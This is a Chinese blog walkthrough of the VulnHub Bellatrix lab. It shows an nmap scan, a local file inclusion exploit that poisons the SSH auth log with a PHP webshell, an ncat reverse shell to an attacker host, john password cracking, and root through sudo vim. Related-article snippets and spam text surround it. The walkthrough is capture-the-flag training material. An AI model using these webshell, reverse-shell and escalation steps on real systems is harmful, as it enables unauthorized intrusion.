<menu id="guoca"></menu>
<nav id="guoca"></nav><xmp id="guoca">
  • <xmp id="guoca">
  • <nav id="guoca"><code id="guoca"></code></nav>
  • <nav id="guoca"><code id="guoca"></code></nav>

    vulnhub之Bellatrix的實踐

    VSole2022-07-30 13:33:28

    今天實踐的是vulnhub的Bellatrix鏡像,

    下載地址,https://download.vulnhub.com/hogwarts/Bellatrix.ova,

    用workstation導入成功,進行地址掃描,拿到地址192.168.58.143,

    接著進行端口掃描,sudo nmap -sS -sV -T5 -A -p- 192.168.58.143,

    看到有http服務,瀏覽器訪問主頁,發現提示php頁面,

    再查看源碼,提示了文件包含漏洞,

    通過文件包含漏洞查看ssh登錄日志文件,

    http://192.168.58.143/ikilledsiriusblack.php?file=/var/log/auth.log,

    向ssh登錄日志文件里注入webshell,

    ssh ''@192.168.58.143,

    再次查看ssh登錄日志文件,是看不到已經注入的webshell的,

    但其實是注入成功的,后來拿到shell后直接查看ssh登錄日志文件就能看到,

    kali攻擊機上開啟反彈shell監聽,nc -lvp 4444,

    利用webshell制造反彈shell,

    http://192.168.58.143/ikilledsiriusblack.php?file=/var/log/auth.log&c=ncat -e /bin/bash 192.168.58.131 4444,

    kali攻擊機上得到反彈shell,不是root,需要提權,轉成交互式shell,

    python3 -c 'import pty; pty.spawn("/bin/bash")',

    從當前賬戶文件里發現了一個賬戶和密碼的hash,

    在kali攻擊機上使用john破解,

    sudo john --wordlist=/usr/share/john/password.lst hash,

    得到賬戶密碼,lestrange/ihateharrypotter,

    切到lestrange賬戶下,再sudo -l發現vim是root權限的,

    老辦法,查找vim的提權方法,

    提權,sudo vim -c ':!/bin/sh',成功,id確認是root,

    shellssh
    本作品采用《CC 協議》,轉載必須注明作者和本文鏈接
    此時,如果你使用的是Linux系統,可以使用mingw-w64-gcc編譯器:CC=x86_64-w64-mingw32-gcc GOOS=windows RSSH_HOMESERVER=192.168.1.1:2343 make client_dll. 當RSSH服務器啟用了Webserver之后,我們也可以使用下列命令進行編譯:./server --webserver :3232. 這種情況適用于無文件注入的場景。WebhookRSSH服務器可以通過命令行終端接口并使用webhook命令發送原始HTTP請求。
    Reverse_SSH上一款基于SSH的反向Shell工具,在該工具的幫助下,廣大研究人員可以使用SSH來實現反向Shell
    一個新發現的規避惡意軟件利用Secure Shell加密協議進入目標系統,目的是挖掘加密貨幣并實施分布式拒絕服務攻擊。
    如果被利用,該漏洞可能允許攻擊者劫持設備的攝像頭和麥克風以監視房主。 安全實驗室 Modux 的研究人員發現了 Enabot 的 Ebo Air 智能機器人的一個缺陷,該機器人旨在娛樂您的整個家庭和寵物。根據 Modux 研究人員的發現,攻擊者可以通過利用該漏洞并監視居住者/用戶來輕松入侵智能機器人。
    安全研究人員觀察到名為 TellYouThePass 的勒索軟件家族嘗試利用最近發現的 Log4j 高危漏洞。TellYouThePass 勒索軟件家族被認為年代比較悠久且基本不活躍,在廣泛使用的 Log4j 日志框架發現漏洞之后,該勒索軟件家族再次活躍。研究人員表示,繼 Khonsari 勒索軟件之后,TellYouThePass 成為第二個被觀察到利用 Log4j 漏洞(被稱為Log4Shel
    網絡交換機充當網絡的構建模塊,促進了局域網(LAN)內的數據流。
    ESXI環境搭建和配置
    2022-05-09 13:32:39
    ESXI環境搭建和配置
    近日,負責提供安全數字化體驗的智能邊緣平臺阿卡邁技術公司(Akamai Technologies)推出了可防范網絡釣魚的全新解決方案Akamai MFA,旨在使企業能夠快速部署FIDO2多因素身份驗證(MFA),而無需部署和管理硬件安全密鑰。Akamai MFA使用智能手機應用程序將現有智能手機轉變為硬件安全密鑰,進而實現流暢的用戶體驗。
    要說哪個網絡威脅組織同時具備狡猾的社會工程學能力和靈活的網絡安全技術,那就不得不提到Muddled Libra了。由于對企業信息技術有著深入的了解,即使你的組織機構擁有完善的傳統網絡防御系統,Muddled Libra也會對你產生巨大的威脅。
    2021 年,全球因勒索軟件造成的損失預計達到 200 億美元,遠高于 2015 年的 3.25 億美元。惡意流量按照攻擊行為可歸納為以下 3 種類型。攻擊行為包括掃描探測、暴力破解等。相比按照惡意流量攻擊行為劃分,學術界更側重于根據惡意流量的內容特征、數據流特征及網絡連接行為特征等具體特征進行劃分。
    VSole
    網絡安全專家
      亚洲 欧美 自拍 唯美 另类